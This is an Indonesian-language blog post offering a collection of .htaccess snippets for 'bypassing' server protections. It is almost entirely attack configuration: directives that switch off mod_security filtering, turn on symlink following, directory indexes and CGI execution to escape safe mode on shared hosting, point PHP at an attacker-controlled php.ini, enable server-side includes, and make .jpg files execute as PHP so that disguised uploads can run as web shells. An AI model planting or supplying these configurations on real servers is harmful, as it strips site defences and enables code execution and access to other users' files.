Kumpulan Code Bypass .htaccess
Sunday, February 9, 2020
Edit
Jadi intinya beda code .htaccess beda fungsi gan, nih kumpulan code htaccess buat bypass.
Cuma satu yang kurang, kode buat bypass cintamu mana?, wkwkwk:v (kidding).
source: www.familyattackcyber.net
Bypass Mod Security :
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Bypass Symlink :
Options All
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
AddType text/html php
Atau Bisa juga :
OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .cgi
AddHandler cgi-script .pl
OPTIONS Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All
Bypass safe mode :
Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini
Bypass 400
Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml
RUN SSI
AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
RUN BYPASS JPG KE PHP
AddHandler application/x-httpd-php .jpg .php
Cuma satu yang kurang, kode buat bypass cintamu mana?, wkwkwk:v (kidding).
source: www.familyattackcyber.net